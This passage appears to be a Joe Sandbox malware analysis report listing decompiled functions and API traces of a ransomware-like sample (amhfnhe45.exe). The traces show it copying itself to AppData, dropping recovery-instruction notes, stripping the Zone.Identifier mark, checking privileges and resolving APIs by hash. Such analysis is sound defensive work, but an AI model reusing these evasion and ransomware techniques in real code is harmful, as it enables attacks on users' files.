				_t10 = _t23 + 0xc; // 0x41c0d0
				_t24 =  *_t10;
				if(_t24 != 0) {
					asm("fld1");
					_t53 = _t49 - 8;
					 *_t53 = _t62;
					 *_t24( &_a164, 0x20);
					_t49 = _t53 + 0x10;
				}
				_a72 = GetCurrentProcessId();
				_t26 =  *0x462890; // 0x440288
				if(_t26 == 0) {
					_t26 = 0x440288;
					 *0x462890 = 0x440288;
				}
				_t13 = _t26 + 0xc; // 0x41c0d0
				_t27 =  *_t13;
				if(_t27 != 0) {
					asm("fld1");
					_t52 = _t49 - 8;
					 *_t52 = _t62;
					_t43 =  &_a72;
					 *_t27( &_a72, 4);
					_t49 = _t52 + 0x10;
				}
				_pop(_t45);
				_pop(_t46);
				_pop(_t35);
				return E004256FE(1, _t35, _a2168 ^ _t49, _t43, _t45, _t46);
			}

0x0041ce49
0x0041ce50
0x0041ce50
0x0041ce5d
0x0041ce67
0x0041ce6a
0x0041ce6f
0x0041ce73
0x0041ce83
0x0041ce8d
0x0041ce93
0x0041ce9e
0x0041cea3
0x0041ce95
0x0041ce9a
0x0041ce9a
0x0041ceaa
0x0041ceb0
0x0041cebd
0x0041cec3
0x0041ceca
0x0041cecc
0x0041ced1
0x0041ced1
0x0041ced6
0x0041ced6
0x0041cedb
0x0041cedd
0x0041cedf
0x0041cee2
0x0041ceef
0x0041cef1
0x0041cef1
0x0041cefa
0x0041cefe
0x0041cf05
0x0041cf07
0x0041cf0c
0x0041cf0c
0x0041cf11
0x0041cf11
0x0041cf16
0x0041cf18
0x0041cf1a
0x0041cf1d
0x0041cf20
0x0041cf27
0x0041cf29
0x0041cf29
0x0041cf33
0x0041cf34
0x0041cf35
0x0041cf45

APIs

Module32Next.KERNEL32(?,?), ref: 0041CE7F
GetTickCount.KERNEL32 ref: 0041CE87
CloseHandle.KERNEL32(?), ref: 0041CEA3
FreeLibrary.KERNEL32(00000000), ref: 0041CEAA

Part of subcall function 0041CF50: QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?), ref: 0041CF65
Part of subcall function 0041CF50: GetTickCount.KERNEL32(?,00000000,?,?), ref: 0041CFAC

GlobalMemoryStatus.KERNEL32(?), ref: 0041CEBD
GetCurrentProcessId.KERNEL32 ref: 0041CEF4

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042BC9B, Relevance: 7.6, APIs: 5, Instructions: 74

C-Code - Quality: 21%

			E0042BC9B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t11;
				intOrPtr* _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t19;
				intOrPtr _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t36;
				intOrPtr* _t37;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;

				_t40 = __imp__DecodePointer;
				_t11 =  *_t40( *0x4833b4, _t33, _t39, _t23, _t27); // executed
				_t24 = _t11;
				_v8 = _t24;
				_t12 =  *_t40( *0x4833b0); // executed
				_t41 = _t12;
				if(_t41 < _t24) {
					L11:
					_t13 = 0;
				} else {
					_t36 = _t41 - _t24;
					_t2 = _t36 + 4; // 0x4
					if(_t2 < 4) {
						goto L11;
					} else {
						_t26 = E0042F682(_t24);
						_t3 = _t36 + 4; // 0x4
						if(_t26 >= _t3) {
							L10:
							_t37 = __imp__EncodePointer; // executed
							_t17 =  *_t37(_a4); // executed
							 *_t41 = _t17;
							_t18 =  *_t37(_t41 + 4); // executed
							 *0x4833b0 = _t18;
							_t13 = _a4;
						} else {
							_t19 = 0x800;
							if(_t26 < 0x800) {
								_t19 = _t26;
							}
							_t20 = _t19 + _t26;
							if(_t19 + _t26 < _t26) {
								L7:
								_t5 = _t26 + 0x10; // 0x10
								_t21 = _t5;
								if(_t5 < _t26) {
									goto L11;
								} else {
									_t22 = E0042D1AB(_v8, _t21);
									if(_t22 == 0) {
										goto L11;
									} else {
										goto L9;
									}
								}
							} else {
								_t22 = E0042D1AB(_v8, _t20);
								if(_t22 != 0) {
									L9:
									_t41 = _t22 + (_t36 >> 2) * 4;
									__imp__EncodePointer(_t22);
									 *0x4833b4 = _t22;
									goto L10;
								} else {
									goto L7;
								}
							}
						}
					}
				}
				return _t13;
			}

APIs

DecodePointer.KERNEL32(004404D8,0043130C,00000001,?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001,?,00426A43,00430A20,00000001), ref: 0042BCB0
DecodePointer.KERNEL32(?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001,?,00426A43,00430A20,00000001), ref: 0042BCBD

Part of subcall function 0042F682: HeapSize.KERNEL32(00000000,00000000,?,0042BCDB,00000000,?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001,?,00426A43,00430A20), ref: 0042F6AD

Part of subcall function 0042D1AB: Sleep.KERNEL32(00000000,00000000,00000000,?,0042BD15,00000000,00000010,?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001), ref: 0042D1D5

EncodePointer.KERNEL32(00000000,?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001,?,00426A43,00430A20,00000001), ref: 0042BD22
EncodePointer.KERNEL32(00000001,?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001,?,00426A43,00430A20,00000001), ref: 0042BD36
EncodePointer.KERNEL32(-00000004,?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001,?,00426A43,00430A20,00000001), ref: 0042BD3E

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042A98C, Relevance: 6.0, APIs: 4, Instructions: 45

C-Code - Quality: 59%

			E0042A98C(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				long _t3;
				long* _t7;
				void* _t8;
				long _t11;
				void* _t18;
				long _t19;
				long* _t20;

				_t18 = __edx;
				_t3 = GetLastError();
				_push( *0x43fbcc);
				_t19 = _t3;
				_t20 =  *((intOrPtr*)(E0042A867()))();
				if(_t20 == 0) {
					_t7 = E0042D15F(1, 0x214);
					_t20 = _t7;
					if(_t20 != 0) {
						__imp__DecodePointer( *0x440e90,  *0x43fbcc, _t20); // executed
						_t8 =  *_t7();
						_t23 = _t8;
						if(_t8 == 0) {
							E004258E3(_t20);
							_t20 = 0;
							__eflags = 0;
						} else {
							_push(0);
							_push(_t20);
							E0042A8D8(__ebx, _t18, _t19, _t20, _t23);
							_t11 = GetCurrentThreadId();
							_t20[1] = _t20[1] | 0xffffffff;
							 *_t20 = _t11;
						}
					}
				}
				SetLastError(_t19);
				return _t20;
			}

APIs

GetLastError.KERNEL32(00482248,?,0042712A,00425824,00482248,00000001,00000000,?,004258DE,?,00000000,?,?,00000000,00000000), ref: 0042A990

Part of subcall function 0042A867: TlsGetValue.KERNEL32(?,0042A9A3,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000,00001000,00000000), ref: 0042A870
Part of subcall function 0042A867: DecodePointer.KERNEL32(?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000,00001000,00000000,?), ref: 0042A882
Part of subcall function 0042A867: TlsSetValue.KERNEL32(00000000,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000,00001000,00000000,?), ref: 0042A891

SetLastError.KERNEL32(00000000,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000,00001000,00000000,?), ref: 0042A9FA

Part of subcall function 0042D15F: Sleep.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 0042D187

DecodePointer.KERNEL32(00000000,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000,00001000,00000000,?), ref: 0042A9CC
GetCurrentThreadId.KERNEL32(?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000,00001000,00000000,?), ref: 0042A9E2

Part of subcall function 004258E3: HeapFree.KERNEL32(00000000,00000000), ref: 004258F9
Part of subcall function 004258E3: GetLastError.KERNEL32(00000000,?,0042A9F6,00000000,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000), ref: 0042590B

Part of subcall function 0042A8D8: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043C1F0,00000008,0042A9E0,00000000,00000000,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C), ref: 0042A8E9
Part of subcall function 0042A8D8: InterlockedIncrement.KERNEL32(0043F460), ref: 0042A92A

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00426B68, Relevance: 4.6, APIs: 3, Instructions: 98

C-Code - Quality: 32%

			E00426B68(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				intOrPtr _t33;
				signed int _t45;
				void* _t55;
				void* _t59;
				intOrPtr _t61;
				void* _t62;

				_t56 = __edi;
				_t43 = __ebx;
				_push(0x58);
				_push(0x43c150);
				E00428E80(__ebx, __edi, __esi);
				GetStartupInfoW(_t59 - 0x68);
				_t61 =  *0x4833a8; // 0x0
				if(_t61 == 0) {
					__imp__HeapSetInformation(0, 1, 0, 0);
				}
				_t62 =  *0x400000 - 0x5a4d; // 0x5a4d
				if(_t62 == 0) {
					_t22 =  *0x40003c; // 0x118
					__eflags =  *((intOrPtr*)(_t22 + 0x400000)) - 0x4550;
					if( *((intOrPtr*)(_t22 + 0x400000)) != 0x4550) {
						goto L3;
					} else {
						__eflags =  *((intOrPtr*)(_t22 + 0x400018)) - 0x10b;
						if( *((intOrPtr*)(_t22 + 0x400018)) != 0x10b) {
							goto L3;
						} else {
							__eflags =  *((intOrPtr*)(_t22 + 0x400074)) - 0xe;
							if( *((intOrPtr*)(_t22 + 0x400074)) <= 0xe) {
								goto L3;
							} else {
								__eflags =  *(_t22 + 0x4000e8);
								_t8 =  *(_t22 + 0x4000e8) != 0;
								__eflags = _t8;
								 *(_t59 - 0x1c) = 0 | _t8;
							}
						}
					}
				} else {
					L3:
					 *(_t59 - 0x1c) = 0;
				}
				if(E00428991() == 0) {
					E00426B3F(0x1c);
				}
				if(E0042AB4E(_t43, _t55) == 0) {
					E00426B3F(0x10);
				}
				E0042BDD5();
				 *((intOrPtr*)(_t59 - 4)) = 0;
				_t26 = E0042B2F2(); // executed
				_t65 = _t26;
				if(_t26 < 0) {
					E00426972(_t55, _t65, 0x1b);
				}
				 *0x4833a4 = GetCommandLineW();
				 *0x4404ec = E0042C5BC();
				_t29 = E0042C50E();
				_t66 = _t29;
				if(_t29 < 0) {
					_t29 = E00426972(_t55, _t66, 8);
				}
				_t30 = E0042C2DC(_t29, _t43);
				_t67 = _t30;
				if(_t30 < 0) {
					E00426972(_t55, _t67, 9);
				}
				_t31 = E00426751(_t56, 0, 1); // executed
				_t68 = _t31;
				if(_t31 != 0) {
					E00426972(_t55, _t68, _t31);
				}
				_t32 = E0042C296();
				_t69 =  *(_t59 - 0x3c) & 0x00000001;
				if(( *(_t59 - 0x3c) & 0x00000001) == 0) {
					_t45 = 0xa;
				} else {
					_t45 =  *(_t59 - 0x38) & 0x0000ffff;
				}
				_t33 = E0041F040(_t69, 0x400000, 0, _t32, _t45); // executed
				 *((intOrPtr*)(_t59 - 0x20)) = _t33;
				if( *(_t59 - 0x1c) == 0) {
					E00426928(_t33);
				}
				E00426954();
				 *((intOrPtr*)(_t59 - 4)) = 0xfffffffe;
				return E00428EC5( *((intOrPtr*)(_t59 - 0x20)));
			}

APIs

GetStartupInfoW.KERNEL32(?,0043C150,00000058), ref: 00426B78
HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00426B8D

Part of subcall function 00428991: HeapCreate.KERNELBASE(00000000,00001000,00000000,00426BE1), ref: 0042899A

Part of subcall function 0042AB4E: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00426BF2), ref: 0042AB56
Part of subcall function 0042AB4E: GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00426BF2), ref: 0042AB78
Part of subcall function 0042AB4E: GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00426BF2), ref: 0042AB85
Part of subcall function 0042AB4E: GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00426BF2), ref: 0042AB92
Part of subcall function 0042AB4E: GetProcAddress.KERNEL32(00000000,FlsFree,?,00426BF2), ref: 0042AB9F
Part of subcall function 0042AB4E: TlsAlloc.KERNEL32(?,00426BF2), ref: 0042ABEF
Part of subcall function 0042AB4E: TlsSetValue.KERNEL32(00000000,?,00426BF2), ref: 0042AC0A
Part of subcall function 0042AB4E: EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC25
Part of subcall function 0042AB4E: EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC32
Part of subcall function 0042AB4E: EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC3F
Part of subcall function 0042AB4E: EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC4C
Part of subcall function 0042AB4E: DecodePointer.KERNEL32(0042AA1F,?,00426BF2), ref: 0042AC6D
Part of subcall function 0042AB4E: DecodePointer.KERNEL32(00000000,?,00426BF2), ref: 0042AC9C
Part of subcall function 0042AB4E: GetCurrentThreadId.KERNEL32(?,00426BF2), ref: 0042ACAE

Part of subcall function 0042B2F2: GetStartupInfoW.KERNEL32(?), ref: 0042B2FF
Part of subcall function 0042B2F2: GetFileType.KERNEL32(?), ref: 0042B432
Part of subcall function 0042B2F2: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042B468
Part of subcall function 0042B2F2: GetStdHandle.KERNEL32(-000000F6), ref: 0042B4BC
Part of subcall function 0042B2F2: GetFileType.KERNEL32(00000000), ref: 0042B4CE
Part of subcall function 0042B2F2: InitializeCriticalSectionAndSpinCount.KERNEL32(-00482274,00000FA0), ref: 0042B4FC
Part of subcall function 0042B2F2: SetHandleCount.KERNEL32 ref: 0042B525

GetCommandLineW.KERNEL32 ref: 00426C17

Part of subcall function 0042C5BC: GetEnvironmentStringsW.KERNEL32(00000000,00426C27), ref: 0042C5BF
Part of subcall function 0042C5BC: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042C5FB

Part of subcall function 0042C50E: GetModuleFileNameW.KERNEL32(00000000,C:\Users\admin\AppData\Roaming\amhfnhe45.exe,00000104), ref: 0042C52E

Part of subcall function 0041F040: AllocateAndInitializeSid.ADVAPI32 ref: 0041F09B
Part of subcall function 0041F040: CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0041F0B4
Part of subcall function 0041F040: FreeSid.ADVAPI32(?), ref: 0041F0C7
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 0041F0E6
Part of subcall function 0041F040: CoCreateInstance.OLE32(0043B924,00000000,00000001,004312C8,?), ref: 0041F168
Part of subcall function 0041F040: ExitProcess.KERNEL32 ref: 0041F188
Part of subcall function 0041F040: CoCreateInstance.OLE32(0043B934,00000000,00000001,004312B8,?), ref: 0041F1A0
Part of subcall function 0041F040: ExitProcess.KERNEL32 ref: 0041F1DE
Part of subcall function 0041F040: LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041F2F2
Part of subcall function 0041F040: LoadStringW.USER32(00000000,00005509,Desktop,000000FF), ref: 0041F310
Part of subcall function 0041F040: LoadStringW.USER32(00000000,00005527,Public Desktop,000000FF), ref: 0041F322
Part of subcall function 0041F040: GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041F329
Part of subcall function 0041F040: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0041F33D
Part of subcall function 0041F040: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0041F34A
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,C:\Windows), ref: 0041F35E
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,C:\Program Files), ref: 0041F36D
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,0000003B,00000000,00000000,C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\Burn), ref: 0041F37C
Part of subcall function 0041F040: SHGetSpecialFolderPathW.SHELL32(00000000,C:\Users\admin\Documents\recover_file_bmrurerhv.txt,00000005,00000000), ref: 0041F389
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,00000010,00000000,00000000,C:\Users\admin\Desktop), ref: 0041F3E4
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,C:\Users\Public\Desktop), ref: 0041F3F3
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,C:\ProgramData), ref: 0041F402
Part of subcall function 0041F040: GetModuleFileNameW.KERNEL32(00000000,C:\Users\admin\AppData\Roaming\amhfnhe45.exe,00001000), ref: 0041F410
Part of subcall function 0041F040: DeleteFileW.KERNELBASE(C:\Users\admin\AppData\Roaming\amhfnhe45.exe:Zone.Identifier), ref: 0041F449
Part of subcall function 0041F040: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0041F468
Part of subcall function 0041F040: CreateMutexW.KERNELBASE(00000000,00000000,12393578327533451), ref: 0041F522
Part of subcall function 0041F040: GetLastError.KERNEL32 ref: 0041F524
Part of subcall function 0041F040: GetVersionExW.KERNEL32(00441738), ref: 0041F56D
Part of subcall function 0041F040: CreateThread.KERNEL32 ref: 0041F597
Part of subcall function 0041F040: SetThreadPriority.KERNEL32(00000000,000000F1,?,?,?,?,?,?,00000000,000001DF,004665A8,00000000,AA6A331C729CA1F,AA6A331C729CA1F,AA6A331C729CA1F,AA6A331C729CA1F), ref: 0041F7C5

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042A867, Relevance: 4.5, APIs: 3, Instructions: 16

C-Code - Quality: 58%

			E0042A867() {
				void* _t1;
				void* _t4;

				_t1 = TlsGetValue( *0x43fbd0);
				_t4 = _t1;
				if(_t4 == 0) {
					__imp__DecodePointer( *0x440e8c); // executed
					_t4 = _t1;
					TlsSetValue( *0x43fbd0, _t4);
				}
				return _t4;
			}

0x0042a870
0x0042a876
0x0042a87a
0x0042a882
0x0042a888
0x0042a891
0x0042a891
0x0042a89a

APIs

TlsGetValue.KERNEL32(?,0042A9A3,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000,00001000,00000000), ref: 0042A870
DecodePointer.KERNEL32(?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000,00001000,00000000,?), ref: 0042A882
TlsSetValue.KERNEL32(00000000,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000,00001000,00000000,?), ref: 0042A891

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00414330, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20

C-Code - Quality: 100%

			E00414330(void* __edx, void* _a4, void* _a8, long _a12, char _a16) {
				int _t6;

				E00413000(__edx, 0, 1, 0xf3fd1c3);
				_t1 =  &_a16; // 0x413720
				_t6 = WriteFile(_a4, _a8, _a12,  *_t1, 0); // executed
				return _t6;
			}

0x0041433e
0x00414343
0x00414358
0x0041435b

APIs

WriteFile.KERNEL32(004665A9,004665A8,00000000, 7A,00000000,004665A8,004665A9,?), ref: 00414358

Strings

7A, xrefs: 00414343, 0041434E

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 004233D0, Relevance: 3.0, APIs: 2, Instructions: 46

C-Code - Quality: 94%

			E004233D0(intOrPtr _a4, signed int _a8) {
				intOrPtr _t15;
				signed int _t18;
				signed int _t22;
				signed int _t28;
				signed int _t30;
				void* _t32;
				void* _t33;

				_t22 = _a8;
				_t28 = 0;
				_t34 = _t22;
				if(_t22 <= 0) {
					_t15 = _a4;
					__eflags = 0;
					 *((short*)(_t15 + _t22 * 2)) = 0;
					return _t15;
				} else {
					do {
						E00426B0C(GetTickCount()); // executed
						_t33 = _t32 + 4;
						do {
							_t18 = E00426B1E(_t34);
							asm("cdq");
							_t30 = _t18 % 0x7a;
						} while (_t30 < 0x61);
						E00426B0C(1);
						_t32 = _t33 + 4;
						 *(_a4 + _t28 * 2) = _t30;
						Sleep(0xf); // executed
						_t28 = _t28 + 1;
					} while (_t28 < _t22);
					 *((short*)(_a4 + _t22 * 2)) = 0;
					return 0;
				}
			}

APIs

GetTickCount.KERNEL32(?,?,?,?,0041386B,00442000,00000003), ref: 004233E1
Sleep.KERNELBASE(0000000F), ref: 00423417

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 004204E0, Relevance: 1.6, APIs: 1, Instructions: 76

C-Code - Quality: 30%

			E004204E0(intOrPtr _a4) {
				signed int _v8;
				char _v136;
				int _v140;
				void* _v144;
				intOrPtr _v148;
				int _v152;
				void* _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr* _t27;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t34;
				int _t35;
				intOrPtr _t43;
				char* _t48;
				intOrPtr _t49;
				signed int _t52;
				signed int _t54;
				void* _t55;

				_t52 = _t54;
				_t55 = _t54 - 0x98;
				_t23 =  *0x43f054; // 0xd6baf341
				_v8 = _t23 ^ _t52;
				_v148 = _a4;
				_t26 = 0;
				_t48 = 0x434498;
				_t35 = 0;
				_v152 = 0;
				_v144 = 0x434498;
				_v140 = 0;
				_t41 = 0xf2;
				while( *((intOrPtr*)(_t35 + 0x434498)) != _t41) {
					_t35 = _t35 + 1;
					if(_t35 < 0x80) {
						continue;
					} else {
						_v140 = _t35;
						L8:
						_t30 = E00413000(_t41, 0, 1, 0xa48d6762);
						_t55 = _t55 + 0xc;
						_push(_t48);
						if( *_t30() == 0) {
							_t31 = E00413000(_t41, _t26, 1, 0xc8ac8026);
							_t55 = _t55 + 0xc;
							_t26 =  *_t31(_t48);
						}
					}
					L10:
					_t27 = E00412F20(_t26, 0xf2276983);
					_t28 =  *_t27(_v148); // executed
					_pop(_t43);
					_pop(_t49);
					_pop(_t34);
					return E004256FE(_t28, _t34, _v8 ^ _t52, _t41, _t43, _t49);
				}
				_t41 =  &_v136;
				_v140 = _t35;
				_v156 =  &_v136;
				if(_t35 > 0) {
					asm("pushad");
					memcpy(_v156, _v144, _v140);
					_t55 = _t55 + 0xc;
					asm("popad");
					_t26 = _v152;
					_t35 = _v140;
				}
				 *((char*)(_t52 + _t35 - 0x84)) = 0;
				_t48 =  &_v136;
				if(_v136 != 0) {
					goto L8;
				}
				goto L10;
			}

0x004204e3
0x004204e5
0x004204eb
0x004204f2
0x004204fa
0x00420500
0x00420502
0x00420507
0x0042050a
0x00420510
0x00420516
0x0042051c
0x00420520
0x00420528
0x0042052f
0x00000000
0x00420531
0x00420531
0x00420588
0x00420591
0x00420596
0x00420599
0x0042059e
0x004205a8
0x004205ad
0x004205b1
0x004205b1
0x0042059e
0x004205b3
0x004205b9
0x004205c8
0x004205cd
0x004205ce
0x004205d1
0x004205da
0x004205da
0x00420539
0x0042053f
0x00420545
0x0042054d
0x0042054f
0x00420562
0x00420562
0x00420564
0x00420565
0x0042056b
0x0042056b
0x00420571
0x00420580
0x00420586
0x00000000
0x00000000
0x00000000

APIs

ShellExecuteEx.SHELL32(?), ref: 004205C8

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 001705DB, Relevance: 1.6, APIs: 1, Instructions: 56

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,00170327,2B14D0EE,?), ref: 00170607

Memory Dump Source

Source File: 00000001.00000002.1396966249.00170000.00000040.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_170000_amhfnhe45.jbxd

Function 0042BD51, Relevance: 1.5, APIs: 1, Instructions: 22

C-Code - Quality: 37%

			E0042BD51() {
				signed int* _t1;
				void* _t3;
				signed int* _t6;

				_t1 = E0042D15F(0x20, 4);
				_t6 = _t1;
				__imp__EncodePointer(_t6); // executed
				 *0x4833b4 = _t1;
				 *0x4833b0 = _t1;
				if(_t6 != 0) {
					 *_t6 =  *_t6 & 0x00000000;
					return 0;
				} else {
					_t3 = 0x18;
					return _t3;
				}
			}

0x0042bd58
0x0042bd5f
0x0042bd62
0x0042bd68
0x0042bd6d
0x0042bd74
0x0042bd7b
0x0042bd81
0x0042bd76
0x0042bd78
0x0042bd7a
0x0042bd7a

APIs

Part of subcall function 0042D15F: Sleep.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 0042D187

EncodePointer.KERNEL32(00000000), ref: 0042BD62

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 004134D0, Relevance: 1.5, APIs: 1, Instructions: 19

C-Code - Quality: 100%

			E004134D0(WCHAR* _a4) {
				void* _t3;
				void* _t5;

				E00413000(_t5, 0, 1, 0x8f8f102);
				_t3 = CreateFileW(_a4, 0x40000000, 0, 0, 4, 0x80, 0); // executed
				return _t3;
			}

0x004134de
0x004134fc
0x004134ff

APIs

CreateFileW.KERNEL32(00442000,40000000,00000000,00000000,00000004,00000080,00000000,help_recover_instructions,00442000,00442040,?,?,?,?,?), ref: 004134FC

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00420700, Relevance: 1.5, APIs: 1, Instructions: 18

C-Code - Quality: 100%

			E00420700(_Unknown_base(*)()* _a4) {
				void* _t3;
				void* _t5;

				E00413000(_t5, 0, 1, 0x6fb89af0);
				_t3 = CreateThread(0, 0, _a4, 0, 0, 0); // executed
				return _t3;
			}

0x0042070e
0x00420724
0x00420727

APIs

CreateThread.KERNEL32(00000000,00000000,0041F7B0,00000000,00000000,00000000,?,0041F7B0,Function_0001FF20,?,?,?,?,00000000,000001DF,004665A8), ref: 00420724

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042BE21, Relevance: 1.5, APIs: 1, Instructions: 13

APIs

EncodePointer.KERNEL32(4AED6A29,?,?,0042677D), ref: 0042BE2D

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00428991, Relevance: 1.5, APIs: 1, Instructions: 10

C-Code - Quality: 100%

			E00428991() {
				void* _t3;

				_t3 = HeapCreate(0, 0x1000, 0); // executed
				 *0x440820 = _t3;
				return 0 | _t3 != 0x00000000;
			}

0x0042899a
0x004289a7
0x004289ae

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00426BE1), ref: 0042899A

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042BA67, Relevance: 1.5, APIs: 1, Instructions: 4

APIs

EncodePointer.KERNEL32(Function_0002BA2E,00426728,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042BA6C

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

